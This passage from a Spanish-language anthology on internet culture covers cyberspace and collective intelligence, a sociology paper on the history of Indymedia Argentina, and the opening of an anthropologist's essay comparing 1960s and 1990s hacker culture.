Los medios de comunicacióntradicionales fabrican un públicohomogéneo, el mensaje mediático buscae l común denominador mental de susdestinatarios, pues el mismo mensajedebe ser leído, escuchado o visto pormucha gente. No tiene pues en cuenta la

Page 323: Internet, hackers y software li   varios

singularidad del receptor, sus opinionessociales, su microcultura, su estado deánimo o su situación particular: es lamasa, la audiencia, el público, tambiénl a peña. Aunque parezca increíble, encierto sentido el ciberespacio nosretrotrae a la situación comunicativa quehabía antes de la escritura a otra escala,obviamente en la medida que lainterconexión y el dinamismo en tiemporeal de las memorias en línea hace quenuevamente se comparta un contextocomunicativo común, imperfecto,inacabado pero en evolución constante,lleno de vida que incluye a las personasy donde nada hay ya extemporáneo o

Page 324: Internet, hackers y software li   varios

fuera de contexto.La extensión del ciberespacio ha

hecho saltar muchos dogmas acerca dela organización de los grupos humanos,y ha dado pie a que se establezcanrelaciones entre los individuos y loscolectivos radicalmente nuevas, sinprecedentes en la historia ni en labiología. El ciberespacio no es otracosa que el soporte técnicoindispensable para dar pie a lainteligencia colectiva.

El movimiento social que sedesarrolla en el ciberespacio lascomunidades virtuales, cada vez másmasivo y potente, prefigura y actualiza

Page 325: Internet, hackers y software li   varios

muchas de las cosas de las queteorizamos en los ámbitos antagonistascomo un ideario de futuro. La activaciónde modos de cooperación flexibles,transversales y no mercantiles y ladistribución coordinada de los centrosde decisión están creando formascomunitarias, emancipadoras,socializadoras y horizontales.

En efecto, el movimiento social quese mueve en el ciberespacio carece deprograma político, pero la autonomía, laapertura a la diferencia, el espacio sinfronteras (la universalidad) y la librecirculación del saber la oposiciónradical al copyright y a la propiedad

Page 326: Internet, hackers y software li   varios

intelectual son sus valoresconstituyentes. Sin centros ni líneasdirectrices, sin contenido particular,acepta todos los contenidos ya que selimita a poner en contacto comunicar unpunto cualquiera con otro, sea cual seala carga semántica o política de cadauno de ellos. Y sería trágico caer en elerror de creer que no hay quepreocuparse demasiado de lo quesucede en el ciberespacio, porque esvirtual y no tiene consecuencias en elmundo real: está transformando ya, y lova a hacer mucho más en el futuroinmediato, las condiciones materiales ysubjetivas de vida en sociedad.

Page 327: Internet, hackers y software li   varios

Queda para otra ocasión reevaluardesde una perspectiva antagonistaalgunas de las implicaciones políticasdel volcado de los medios decomunicación tradicionales el teléfono,la televisión, la radio, el fax, losperiódicos, los libros… en elciberespacio. Aunque conviene aclararque no creo que resulte posible preverlas mutaciones con que la digitalizacióny por tanto la posibilidad de tratamientonumérico con ordenadores modificaránuestras formas de comunicarnosdespués del año 2000, sí que se hacenecesario anticiparse de alguna maneraa sus efectos, indagar en esos usos antes

Page 328: Internet, hackers y software li   varios

de que sean definitivamente recuperadospor el mando.

Page 329: Internet, hackers y software li   varios

Nuevos medios parahacer medios: el caso

Indymedia

Marilina Winik estudia sociología enla Universidad de Buenos Aires y esmiembro de Indymedia Argentina desdefebrero de 2002.

El texto que presentamos fue hechopúblico como ponencia en el marco delII Congreso Nacional de Sociología y VIJornadas de Sociología de la UBA, en lamesa Tecnología y Sociedad.

Indymedia es la red de comunicación

Page 330: Internet, hackers y software li   varios

antagónica más desarrollada a nivelglobal. Emergente de una nueva realidadhistórica, social y económica, es elresultado de una manera novedosa parala articulación entre activistas demúltiples movimientos sociales y nuevastecnologías. Políticamente, estaarticulación implica la apropiación delespacio que posibilitó la expansióncapitalista, para la lucha contra esemismo sistema de prácticas y discursos.Desde el punto de vista histórico, es enla cumbre de la OMC en Seattle de 1999(en su fracaso) donde Indymedia deja deser un mero centro de contrainformaciónpara comenzar un proceso de

Page 331: Internet, hackers y software li   varios

crecimiento tal que hoy la convierte enl a red de redes más grande del mundo.Esto es así porque pudo capitalizar laheterogeneidad sin desvirtuarla.

Dentro de este contexto, IndymediaArgentina surgió a partir de lasmovilizaciones contra el ALCA en abrilde 2001. Compartiendo los principiosde unidad de la red global, la realidadlatinoamericana le imprime unaimpronta distinta. No sólo crea redes ynodos de red, sino que sus discursos yprácticas se vinculan muy estrechamentecon la multiplicidad de los movimientossociales argentinos: es vehículo dedifusión pero también herramienta de

Page 332: Internet, hackers y software li   varios

articulación.

1) Contexto de surgimiento:los 90 y el movimientoantiglobalizacion

La cumbre de la OrganizaciónMundial de Comercio (OMC) que secelebraría en Seattle (EE.UU), habíasido preparada minuciosamente por losprincipales centros de poder político(los Estados Unidos, la Unión Europea,Japón y Canadá) en íntima relación conel poder económico-financiero

Page 333: Internet, hackers y software li   varios

transnacional. Pero la cumbre fracasó:los hombres representantes de las elitesmás poderosas del mundo nuncallegaron a reunirse. En paralelo a lospreparativos de la OMC, diferentesredes y grupos de todo el mundo(llamados antiglobalización) articularondiversas acciones de protesta. El 30 denoviembre de 1999 se convirtió en elsímbolo de su primera victoria.

Más de 50.000 personas semovilizaron hasta Seattle, más de 1.500organizaciones a escala planetariaayudaron a fomentar la organización,hubo protestas en 70 ciudades de 30países del norte y del sur, del este y del

Page 334: Internet, hackers y software li   varios

oeste. Una multiplicidad desubjetividades se articuló en unacontecimiento que impugnabanodalmente al capital en la voz: elmundo no es una mercancía.

¿Cuál fue la condición deposibilidad de esta extrañaconvergencia? ¿Cómo explicar que fuerapolíticamente efectiva? La respuestagira alrededor de un modelo dearticulación hasta entonces desconocido:las acciones de protesta se habíanestructurado alrededor de un mediorápido y económico, Internet.

El Movimiento de ResistenciaGlobal o Antiglobalización —así lo

Page 335: Internet, hackers y software li   varios

denominaron los medios masivos—comenzó como una corriente de protestamundial que aunaba a decenas de gruposde diferentes países que tenían en comúnsu rechazo al capitalismo y al modeloneoliberal. Un movimiento en el que sedieron (y dan) cita colectivos diferentes:sindicatos, intelectuales de izquierda,ecologistas, indigenistas, activistas degénero y grupos desfavorecidos queacusaban (y acusan) al sistemaeconómico de amoral e injusto.

2) Breve historia deIndymedia

Page 336: Internet, hackers y software li   varios

Indymedia nace como un proyectosituacional, para organizar lacontrainformación durante la cumbre deOMC. Indymedia (como la patacomunicacional del movimientoantiglobalización) pudo capitalizar launión de un amplio sector de colectivosy redes preexistentes en el marco de unentramado de comunicación alternativa yantagónica. El sitio (originalmentepensado para empezar y terminar en lacumbre) recibió más de un millón ymedio de visitas y esto provocó lanecesidad de conformar una red decomunicación antiglobalización que semultiplicó en más de 150 sitios a lo

Page 337: Internet, hackers y software li   varios

largo de todo el mundo.

2.1) El activismointernacional en los ’80 y’90

Durante los años ‘80 y ‘90 seorganizaron innumerables experienciasde éxodo y de construcción de mundosautónomos: los centros socialesitalianos, la netculture del norte deEuropa, el zapatismo en Chiapas, lacultura hip hop, las comunidades de semterra brasileñas, las experiencias

Page 338: Internet, hackers y software li   varios

psicotrópicas individuales y colectivas,las editoriales underground, las revistasmilitantes, las radios libres.

Todo ello permitió a la inteligenciaautónoma reproducirse y resistir durantelos últimos veinte años, pensando endiferentes maneras de resistencia,creando nuevas formas de organizaciónradical que no respondiesen a modelosquebrados por la historia más reciente,siendo lo menos funcionales al sistema.

Pero por sobre todas las realidadesregionales o de afinidad, los medios decontrainformación fueron la respuesta alas necesidades concretas de colectivosy movimientos sociales, para los cuales

Page 339: Internet, hackers y software li   varios

era imprescindible dar a conocer susexperiencias para continuar siendocolectivos o movimientos. Es decir, darvisibilidad y enunciabilidad a todoaquello que los mass mediadistorsionaban, ocultaban, manipulabano simplemente ignoraban. La tareaentonces de estos medios fue (y siguesiendo) romper el cerco de lainformación recortada, ideologizada ypasiva.

2.2) Indymedia Global:registros y códigos dediferencia e igualdad

Page 340: Internet, hackers y software li   varios

Desde su momento fundacional en1999, la posibilidad de hacer medios seconvirtió en equivalente a hacersociedad para el activismo global. Eraimposible seguir pensando en elactivismo político sin crear medios, omejor dicho, sin desarrollar una red enla que confluyan estos nuevos medios.Indymedia o Centro de MediosIndependientes (CMI) fue entonces unpunto convergencia para quienesdecidieron construir una red desde ladiversidad de movimientos:comunidades de video activistas,pequeñas radios piratas, hackers,desarrolladores de códigos, productores

Page 341: Internet, hackers y software li   varios

de fanzines, periodistas, etc.La heterogeneidad implica

complejidad. En Indymedia coexistíancolectivos con largas tradiciones delucha, con experiencias autónomas ymuchas veces fragmentadas. Pero habíaun punto de coincidencia que continúaexplicando su duración en el tiempo: elmediactivismo, simplificado a su vezcomo fenómeno mediático, irrumpe conla coyuntura Internet-Seattle.Convergencia de la informaciónautorganizada en red y florecimiento dela red global[71]. Según el italianoF r a nc o Bifo Berardi, el activismomediático, además, constituye una esfera

Page 342: Internet, hackers y software li   varios

pública autónoma, un espacio desustracción al de la invasiónmediática.[72]

2.3) Los Principios deUnidad (la diferencia y laigualdad)

Construye tus medios es una de lasconsignas de Indymedia global. Y desdeallí se explica que la red sea hoy una delas mayores comunidadesanticapitalistas del mundo. Es asíporque, desde sus principios, surge no

Page 343: Internet, hackers y software li   varios

sólo la posibilidad de informar (contra-informar) rompiendo la tradicionallógica emisor/ receptor (en tanto noexiste una autoridad que determine quiénpublica ni quién lee y, además, susformatos son múltiples), sino quetambién de esta manera alienta a laparticipación de todos.

La organización interna de losdistintos colectivos y de la propia redglobal es horizontal: las decisiones setoman por consenso y en lugar deverticalidad, las responsabilidades sedistribuyen según las tareas que cadaactivista decide realizar.

Políticamente, Indymedia se

Page 344: Internet, hackers y software li   varios

reconoce anticapitalista y antipatriar cal.En Indymedia todo trabajo realizado esvoluntario y militante.

Frente a la unidireccionalidad de losmedios masivos —concentrados enoligopolios, hábiles tergiversadores delos hechos y naturalizadores porantonomasia de la explotación—,Indymedia se propone como herramientade participación que hagan del receptor,no un espectador pasivo, sino unmultiplicador de conciencia y devisiones de la realidad que cuestionende raíz el sistema vigente. Por eso no seentiende a la información comomercancía sino como una manera de

Page 345: Internet, hackers y software li   varios

articular la lucha.

3) Indymedia Argentina

La experiencia Indymedia enArgentina no tiene antecedentes. Laposibilidad de democratizarradicalmente un medio de comunicacióny ponerlo al alcance de todos,trabajando desde la consigna cadapersona es un corresponsal fue, sinduda, el inicio de una nueva era entérminos de comunicación, informacióny posibilidad de cambio que ofrecía la

Page 346: Internet, hackers y software li   varios

tecnología.

3.1) La paradoja en lapropia génesis

Sin la trayectoria europea de la netculture y sin el movimientoantiglobalización, Indymedia Argentinano hubiese existido. Desde sus iniciosen abril de 2001, este colectivo sepropuso construir una comunicaciónamplia, democrática, de base. O, enotras palabras, aportar a la lucha demiles y miles por forjar una nueva

Page 347: Internet, hackers y software li   varios

cultura, tanto política comocomunicacional.

Pero, en su misma génesis seprodujo una paradoja: las condicionesde posibilidad de Indymedia Argentina(el contexto internacional anglo-europeo) nada tenían que ver con lasrealidades locales. Los actores socialesy políticos, así como los efectos delcapitalismo son diferentes. Lasestrategias de lucha definen susprioridades de acuerdo a los conflictos.Y aquí los conflictos son otros.Obviamente, el capital suele ser la vozbajo la cual la lucha se define, por lomenos en niveles teóricos. Pero de cara

Page 348: Internet, hackers y software li   varios

a las realidades de los barrios delconurbano, la lucha ecologista, elcopyleft y el software libre hacían ruidoen el cuerpo de los activistas argentinos.

Paradoja entre medios disponibles yregistros discursivos (es decir, deprácticas sobre —y en— las cuales elregistro discursivo se construye).Activistas ecologistas con laptop,activistas piqueteros en el puentePueyrredón… ¿qué decían y quiéneseran los que armaban la página web?¿Paradoja posmoderna o simpleparadoja de la lucha de la clase mediaen los países pobres?

Paradoja que no se produjo en el

Page 349: Internet, hackers y software li   varios

nivel teórico sino en la práctica política.Y por esta razón, los que armaban lapágina argentina entendieron que elescenario de esta última sería el lugarde las respuestas.

4) La práctica desde el 19 yel 20 de 2001: primerarespuesta a la paradoja

El nacimiento de IndymediaArgentina representa un quiebre muyfuerte de las interpretacionesprimermundistas, por la falta de historia

Page 350: Internet, hackers y software li   varios

local en materia de usos de lastecnologías para el cambio. Yjustamente por esta razón, se resignificaen el contexto latinoamericano a partirdel 19 y 20 de diciembre de 2001.

La realidad y la manera deabordarla, hizo que desde sus primerosaños de vida pueda ser un lugar dereferencialidad muy concreta paranuevos actores sociopolíticos. Nuevosen la Argentina y diferentes de los quedan sus luchas en el contexto anglo-europeo.

Hoy Indymedia se piensa más quenada como una red de acción quecontiene el mismo principio: acrecentar

Page 351: Internet, hackers y software li   varios

la participación e involucrar cada vezmás grupos y colectivos en unamultiplicidad de espacios que secontinúan abriendo constantemente.Todos estos escenarios tienen la comúninquietud por experimentar y aportar adiferentes proyectos (que a su vez semultiplican).

4.1) Los primeros modos detrabajo: patear la calle

La tarea que se había propuesto elcolectivo Indymedia Argentina fue, en un

Page 352: Internet, hackers y software li   varios

primer momento, la realización de lascoberturas: salir a las calles y relatardesde una perspectiva radical cuáleseran las necesidades de lasorganizaciones en dar a conocer susconflictos, no reflejadas por la voz delos grandes medios (que juegan siemprede aliados con el poder de turno). Hacercoberturas implicaba tejer redes entreeste nuevo actor que se proponíaintervenir sobre la realidad social, elmediactivista, y los diferentesmovimientos sociales. Esto tuvo unimpacto muy grande en las distintasorganizaciones y movimientos ya que losmediactivistas que estaban en las calles

Page 353: Internet, hackers y software li   varios

todos los días y cubrían las diferentesmanifestaciones comenzaron a tejer esasredes con los distintos referentes y conlas bases de las organizaciones queluego, eran los que daban credibilidad alas publicaciones del sitio. El estar en lacalle constantemente, dio a IndymediaArgentina la posibilidad de hacerseconocidos y requeridos por losmovimientos sociales. Estos sectoresque participan en las luchas socialesrápidamente adquieren una posturacrítica sobre los medios decomunicación, especialmente sobre eltelevisivo, que evita rotundamentemostrar sus acciones, sus

Page 354: Internet, hackers y software li   varios

movilizaciones y sus propuestas. Asíqueda en evidencia para un sector dela sociedad la dictadura mediática enla cual están inmersos.[7 3]

5) La práctica durante lamasacre en el PuentePueyrredón: segundarespuesta a la paradoja

Durante 2002 el dar voz a los queno tienen voz se transforma junto con elescenario político argentino. La difusiónde los conflictos entre las

Page 355: Internet, hackers y software li   varios

organizaciones piqueteras y el estado seconstituye en otra experiencia quereorienta las prácticas.

Relata Tomás, un compañero deIndymedia, sobre lo ocurrido el 26 dejunio de 2002: Cuando asesinaron alos compañeros Dario Santillán delMTD de Lanús y Maximiliano Kostekidel MTD Guernica en Avellaneda, el 26de junio de 2002, los medios frente a labrutal represión hasta que la evidenciay la movilización señalaron locontrario hablaron de«enfrentamientos». Prefirieron mostrarlos palos, las gomeras y las capuchasde los piqueteros, justificando el

Page 356: Internet, hackers y software li   varios

dispositivo represivo y evitando hablarde las balas de plomo que el gobiernode Duhalde y de Felipe Solá y el FMIordenaron que se disparen para acabarcon la protesta social.

Indymedia actuó no solo comotestigo directo sino que, desde el sitio,en la portada denunciaba Asesinos a losque provocaron la masacre.

A un mes de lo ocurrido y comoprimer regreso al Puente Pueyrredón,Indymedia video realizó el videodocumental Piquete Puente Pueyrredón.Fue visto por muchísimas personas queformaban parte de los distintosmovimientos, y en él se podía conocer

Page 357: Internet, hackers y software li   varios

cuáles habían sido los hechos(mostrados ahora desde una perspectivamilitante —imágenes desde el otro ladode la barricada). Se denunciaban,también, las estrategias inconsistentes delos grandes medios aliados al poderpolítico que buscaban, por sobre todo,crear opinión pública en torno a unaidea de piqueteros violentos ycriminales.

En esa misma jornada también seconfeccionó una muestra de fotos queincluía fotos de Dario Santillán. Lagente del movimiento se asombraba ytocaba la foto, una larga cola seformaba para verla y no faltaron

Page 358: Internet, hackers y software li   varios

lágrimas y los rezos sobre la imagen.Un fenómeno opuesto al de las últimassemanas donde Darío había sidoretratado por los grandes medios comoun violento que había atacado a lapolicía, o lo mostraban desangrándose,como parte de una campaña decriminalización de la protesta sobrelos movimientos populares.[74]

Luego, eran las mismasorganizaciones las que llamaban acompañeros para pedir la presencia deIndymedia en diferentes acciones, comotomas de terrenos, cortes de ruta, o tansolo para invitarlos a los barrios yproyectar videos, armar muestras de

Page 359: Internet, hackers y software li   varios

fotos, talleres de prensa o audiovisuales,como ocurrió durante el 2003. Ese añoconcluyó con el armado de tres foto-montajes realizados en colaboraciónentre gente de los barrios e Indymedia,los cuales fueron exhibidos para elprimer aniversario del asesinato deDarío Santillán y Maximiliano Kostekien el Puente Pueyrredón.

5.1) Redefiniciones de losmodos de trabajo: intervenirmás

Page 360: Internet, hackers y software li   varios

Indymedia Argentina no se quedósolamente con el formato Internet. Esbien sabido que en esta parte delhemisferio muy pocas son lasposibilidades de acceder y manejar laherramienta Internet. En la Argentina elpromedio de población con acceso aInternet (en forma muy limitada) es de3 millones de personas, en un país conuna población de 37 millones. Esevidente que el acceso a este medio noes masivo.[75] Durante los tres años setrabajó muy fuertemente para sacarIndymedia de Internet, aunqueclaramente el sitio continuó siendo unelemento fundamental de comunicación.

Page 361: Internet, hackers y software li   varios

Indymedia se piensa a sí mismacomo usina y laboratorio decomunicación. La dinámica y los usos delas nuevas tecnologías de comunicación,sobre todo de Internet, hicieron que lasdiscusiones de Indymedia Argentinapasaran por pensar cuál debía ser lautilidad de un medio basado en Internet.En Argentina los límites son claros.

Surgió entonces la necesidad deplantear que, para que IndymediaArgentina lograra una real inserción enlos sectores populares, se debía trabajarpor fuera de la página: organizando, porejemplo, muestras de videos y fotositinerantes, proyecciones en los barrios

Page 362: Internet, hackers y software li   varios

y en centros sociales y culturales,talleres de Internet, de periodismo y deeducación popular. Para este colectivosiempre fue importante crear yprofundizar los lazos con las bases,porque de lo contrario, correría elriesgo de formar parte de aquello quedenunciaba.

6) Redefiniciones sobre finde 2004: las redes

La red, según la conciben y lapractican en Europa y Estados Unidos

Page 363: Internet, hackers y software li   varios

—países centrales que comenzaron autilizarla—, surge como respuesta deuna organización fundada por grupos ycolectivos que visualizaron laimportancia de los medios alternativosy, correlativamente/paralelamente, delrol central de la oligarquía de lainformación/entretenimiento en elcapitalismo global. En forma lúcida, elmovimiento antiglobalización, dice DeeDee Halleck, considera a los medioscorporativos como parte integrante delproblema. Para estos activistas —continúa—, crear nuevos modos decomunicación es parte imprescindiblede la respuesta al neoliberalismo.

Page 364: Internet, hackers y software li   varios

La red funciona según un modelo detipo rizomático, es decir que se vandesarrollando en diferentes lugares delglobo nodos de iguales características:no jerárquicos, descentralizados yautónomos. Este modelo responde a lasexigencias de auto-organización deltrabajo virtual según un procesoigualitario y difusivo.[76]

La utopía de la red de Félix Guattari,filósofo francés que se dedicó en suvejez a pensar las redes, ya advertía enlos años ‘80 que los progresos en lainformática tenderían a redesrizomáticas, relaciones bidireccionalesy multidireccionales entre colectivos de

Page 365: Internet, hackers y software li   varios

enunciación postmediática, queinfectarían el sistema televisivocentralizado y sacudirían ydesestructurarían todas las formas detipo estatal y de tipo económico.

Según Bifo, esta utopía se encarnóen la tecnología, en la cultura, e inclusoen la empresa. En el transcurso de los‘90 se desarrolló el rizoma, pero fueinfiltrado por el virus de tipocentralizado, jerarquizador. El uso de lapublicidad, del business, de latelevisión en la red fueron aspectos deesta infiltración. Las redes existen yestán a disposición no sólo de aquellosque creen en que esta forma de

Page 366: Internet, hackers y software li   varios

organización posibilita lademocratización radical, ladescentralización de la información, laeliminación de las jerarquías y laposibilidad de una nueva forma deorganización global que luche para elcambio social, sino que también elenemigo es usuario y propagador deredes que alimentan el sistema. Bifoentonces lo plantea como una guerraentre dos paradigmas: es la guerraentre el dominio y la libertad (…) eneste sentido la utopía de Guattariparece cada día desmentida yreafirmada por la perpetua dinámicadel dominio y la libertad.[77]

Page 367: Internet, hackers y software li   varios

En Latinoamérica las redes que seconstruyen son bien difusas. Hablar delconcepto de red, en el sentido que sepropone el concepto de redprimermundista, todavía es abordar laproblemática casi a tientas. Laparticipación en la red de redes deIndymedia global, fue y sigue siendo unaprendizaje cotidiano. IndymediaArgentina fue el nombre del colectivoBuenos Aires durante más de 2 años, elcual editorializaba y pretendía reflejaruna realidad acabada del país. Luego dela aparición de Rosario en julio de2002, de la emergencia de temáticasespecíficas como es el caso de la de

Page 368: Internet, hackers y software li   varios

Pueblos Originarios en agosto de 2002y, ya para mediados de 2003, con laaparición de gente interesada enarmarIndymedia en Santiago del Esteroy La Plata (que nace recién en enero de2004 luego de hacer un proceso),Indymedia Buenos Aires cede el lugarde página central y se convierte en unasección territorial de la lista desecciones.

A partir de entonces hay una ideaque recorre a todos los colectivos queempiezan a formar parte de lo que sedenomina red Argentina en darle lugar alos diferentes colectivos, grupos,individuos de realizar tareas

Page 369: Internet, hackers y software li   varios

específicas.Un ejemplo es el recién surgido

colectivo de Medio Ambiente. Éste, seconcreta con el llamado a grupos,colectivos e individuos interesados en laeditorialización de la sección. Entoncesse suman a la red no sólo individuosinteresados en el proyecto decontrainformación, sino tambiéncolectivos que trabajan la temáticaespecífica y que no encuentran porninguna otra vía la posibilidad que lesbrinda la herramienta Indymedia para ladifusión de la misma.

El ejemplo es fractal, ya que esposible que este colectivo comience a

Page 370: Internet, hackers y software li   varios

publicar y encuentre otros semejantesque hacen lo mismo dentro del país,luego de la región y luego a nivel global;y que formen parte de otrasorganizaciones que están en constantemovimiento y que necesiten a lacomunicación alternativa como mediopara difundir y enriquecer el espectro detemático. Lo mismo vale para PueblosOriginarios, Género, Contracultura oVideo.

Indymedia en Argentina estátendiendo, cada vez más, a convertirserealmente en una herramienta utilizadapor miles de personas, que cada díaencuentran en el sitio un lugar con

Page 371: Internet, hackers y software li   varios

información que permite dar a conocerlas luchas cotidianas cada vez máslocalmente y con emisores cada vez máslocales.

Bibliografía Berardi, Franco (Bifo),La incesante guerra entre red yvideocracia, en Pasquinelli, Matteo(comp.), Mediactivismo: Estrategias yprácticas de la comunicaciónindependiente. Roma, DerieveApprodi,2002. Boido, Pablo, Ponencia realizadapara Our media, Colombia, julio 2003.Duran Etxezarreta, Saez, Globalizacióncapitalista. Barcelona, Virus, 2001.Halleck, Dee Dee, Una tormenta

Page 372: Internet, hackers y software li   varios

envolvente: el cyber-forum abiertoIndymedia, en Pasquinelli, Matteo(comp.), Mediactivismo: Estrategias yprácticas de la comunicaciónindependiente. Roma, DerieveApprodi,2002. Pasquinelli, Matteo (comp.),Mediactivismo: Estrategias y prácticasde la comunicación independiente.Roma, DerieveApprodi, 2002. Vinelli,Natalia y Rodríguez Esperón, Carlos,Contrainformación: medios alternativospara la acción política. Buenos Aires,Continente, 2004.

Fuentes digitales:htttp://argentina.indymedia.org/htttp://www.docs.indymedia.org/

Page 373: Internet, hackers y software li   varios

htttp://www.ecn.org/htttp://www.lahaine.org/htttp://www.lavaca.org/htttp://www.nfm.org/http://www.nodo50.orghtttp://www.rebelion.org/htttp://www.rekombinant.org/

Page 374: Internet, hackers y software li   varios

HACKERS

Page 375: Internet, hackers y software li   varios

Viejos hackers, nuevoshackers:

¿son distintos?

Steve Mizraches antropólogo.Investiga y enseña en la Universidad deFlorida, EE.UU. Escribe sobre temasc o m o cibercultura y fronteraelectrónica (junto a otros tan inciertoscomo el fenómeno ovni).

Este artículo es una miradaretrospectiva de la cultura hacker,descripta a partir de los nuevos estilosde hackers que aparecieron en los ‘80.

Page 376: Internet, hackers y software li   varios

Aparentemente, para la genteenamorada de la vieja escuela dehackers, como Steven Levy o CliffordStoll, hay una gran diferencia. De hecho,no les perdonan a los hackers del viejoestilo del MIT/Stanford que se hayandejado ganar en los medios su honorabletítulo a manos de esa gente… paramuchas personas, hacker quiere deciruna clase de personas de los ‘60, ciertaestirpe de programadores que lanzó larevolución informática, pero queparece que no anda más por esta zona…de acuerdo a estos hackers de la viejaescuela, hackear significaba voluntadde hacer accesible y abierta la

Page 377: Internet, hackers y software li   varios

tecnología, cierto amor por lacomputadora que significaba quepreferían programar en vez de dormir .Significaba un deseo de crear bellezacon las computadoras, de liberar lainformación, de descentralizar el accesoa la comunicación…

Pero ¿qué pasa con los nuevoshackers? Muchos de los viejos hackerspiensan que no merecen ese nombre, yprefieren llamarlos criminalesinformáticos, vándalos, crackers, ogolpeando bajo y desde un sesgogeneracional, delincuentes juveniles.Los medios usan el término hacker parareferirse a jóvenes talentosos, usuarios

Page 378: Internet, hackers y software li   varios

de computadoras que usan sus modemspara entrar sin autorización a otrossistemas, muy parecido a como sedescribe en la película Juegos deGuerra. Y a los hackers de la viejaescuela esto les molesta. La mayoría delos hackers nuevos no saben programar;sólo son personas sin ética que no tienenproblemas en robar passwords, códigos,software u otra información eintercambiarla con sus amigos. Podránser buenos explotando las fallas deseguridad de los sistemas, pero lo únicoque logran (dicen algunos como Stoll) esdestruir la confianza sobre la cual seconstruyen las redes abiertas.

Page 379: Internet, hackers y software li   varios

Me interesa, no necesito decirlo, elaspecto generacional de esta batalla porel título de hacker. La mayoría de losviejos hackers de los ‘60 viven, desdeya, en los ‘90 —Baby Boomers que,como sus amigos exhippies, pasaron defreaks a personas serias, consiguiendoempleo en empresas de seguridadinformática y megaindustrias delsoftware. Y como tantos que provienende la contracultura, simplemente noentienden que esta Generación X sea lacontracultura de los ‘90… ¿dónde quedóla apertura? ¿el idealismo? Estosdelincuentes juveniles no viven segúnlos altos standars morales de los

Page 380: Internet, hackers y software li   varios

nostálgicos de los ‘60 como Levy yStoll. Aunque, al fin y al cabo, Levyvocifera sobre aquellos grandes hackersque fundaron Apple Computers ylanzaron la revolución de la PC —¡esosm i s m o s ex-phreakers[78], Job yWozniak, que de hecho permitieron quesu empresa sacara patentes de sussistemas de hardware y software!

Los cyberpunks de los ‘90, parece,no cumplen con lo que esperan de ellosgente como Stoll y Levy. Y todos losviejos hackers hacen malabares paramarcar sus diferencias con la nuevacamada de hackers, quejándose cuandose les sigue aplicando el título. Yo

Page 381: Internet, hackers y software li   varios

sostendría que los hackers de los ‘90 noson tan distintos de los hackers de los´60, que, de hecho, trabajan con losmismos impulsos exploratorios, anti-autoritarios, liberadores; ocurresimplemente que los hackers de los ‘60no comprenden la situación en quevivimos, y esto probablemente esporque leen literatura hippie de los ‘60en vez de ciencia ficción cyberpunk delos ‘90… no comprenden por qué elnuevo hacker actúa como actúa.

Para Levy, las diferencias entre losviejos y nuevos hackers son grandes yevidentes. El primer grupo competía porcrear, el segundo compite por destruir y

Page 382: Internet, hackers y software li   varios

robar. El primer grupo amaba el controlque tenía sobre sus computadoras, elsegundo grupo ama el control que lascomputadoras les proporcionan sobrelas personas. El primer grupo siemprebuscó mejorar y simplificar; el segundogrupo sólo se aprovecha y manipula. Elprimer grupo hacía lo que hacía por unsentimiento de verdad y belleza quehallaban en la actividad; el segundogrupo hackea por beneficios y status.

El primer grupo era comunitario ymuy unido, compartía siempre demanera abierta sus nuevas hackeadas ydescubrimientos; el segundo, dice Levy,es paranoico, marginado y se mueve en

Page 383: Internet, hackers y software li   varios

secreto. Para Levy, los viejos hackerseran magos de las computadoras, perolos nuevos hackers son terroristasinformáticos en busca de nuevas formasde vandalismo electrónico o de bromasmaliciosas, que no se fijan en lasconsecuencias.

Pero donde Levy ve diferencias, yoveo algunas semejanzas. Los viejoshackers a la antigua del MIT eranbastante famosos por andar manipulandocerraduras, en sus versiones tanto físicascomo electrónicas. ¿Hay tanta diferenciaentre la justa ira del hacker del MITcontra los sacerdotes de IBM que lomantenían alejado de las grandes

Page 384: Internet, hackers y software li   varios

centrales [mainframes], y el hacker delos ‘90 que siente justa ira porque se leniega el acceso a grandes bases de datoscomerciales sin una costosasuscripción? Los antiguos hackers delMIT eran famosos también por suexploración del sistema telefónico, y porbuscar trucos para hacer llamadasgratuitas a lugares extraños. De hecho,muchos de los primeros hackers eranphreakers telefónicos, así de simple: secolaban en el sistema de la compañía deteléfonos (La compañía, ATT, alias MaBell en ese entonces) y se ofendíanporque ésta se negaba a compartirinformación técnica sobre telefonía.

Page 385: Internet, hackers y software li   varios

Los hackers de los ‘60 eran famosospor su deseo de liberar la información.Compartían abiertamente los códigosfuentes de sus programas; los miembrosdel Homebrew Computer Club [Club deComputadoras Caseras] tambiéncompartían las fallas de distintascomputadoras, y trucos para mejorar susrendimientos. Como Levy parece pensarque la piratería de programas no deberíaser un delito (dado que piensa que elcódigo fuente no debería tenercopyright), su problema con los nuevoshackers no es la piratería. Ni parece serel hecho de que compartan librementecierta información del mundo real

Page 386: Internet, hackers y software li   varios

ciertamente peligrosa como el Manualdel Anarquista sobre cómo hacerbombas y drogas. Más bien, parecereferirse a los delitos maliciosos de unaminoría pequeña, dedicada adesparramar Troyanos, bombas lógicas,virus, gusanos y otros programasdestructivos…

En la actualidad la mayoría de losvirus (como el virus Christmas) soninofensivos. Ocupan porciones mínimasde la memoria, y están programados nopara borrar el disco rígido, sino paramostrar un mensaje en un momento dado.Son sutilezas —algo que Levy dice quetambién entusiasmaba a los hackers del

Page 387: Internet, hackers y software li   varios

MIT. Ellos se hicieron conocidos porrealizar complejas bromas a otros, yeran maestros de la ingeniería social —el arte de manipular tecnócratas siendoun artista del engaño— igual que loshackers de los ‘90… sus elaboradosjuegos y sutilezas muchas veces sonmaneras de demostrar su superioridadante profesores, operadores y otrossabelotodos de los que sienten que seinterponen en su acceso a lascomputadoras…

A l invadir los sistemas telefónicosd e correo de voz de las empresas, loshackers de los ‘90 no son disintos de loshackers del MIT de los ‘60 que

Page 388: Internet, hackers y software li   varios

mapeaban el laberinto del sistema detúneles del subsuelo del MIT. Lo hacenpor los mismos motivos: porque lesdicen que no lo hagan, porque lostúneles muchas veces llevan a lugaressorprendentes; porque la actividad esinofensiva incluso aunque se la declareno permitida o incluso ilegal, y porqueles brinda un sentimiento de destreza ydominio sobre un problema complejo.La verdad es que la mayoría de loshackers de los ‘90 no son destructivos niperversos descontrolados. De hecho,muchos suscriben a una Ética Hackeractualizada en los ‘90, que sostiene queno van a hackear la privacidad de las

Page 389: Internet, hackers y software li   varios

personas ni a los usuarios decomputadoras personales, declarando encambio que sus objetivos serán lascorporaciones grandes e irresponsableso las organizaciones burocráticas de losgobiernos…

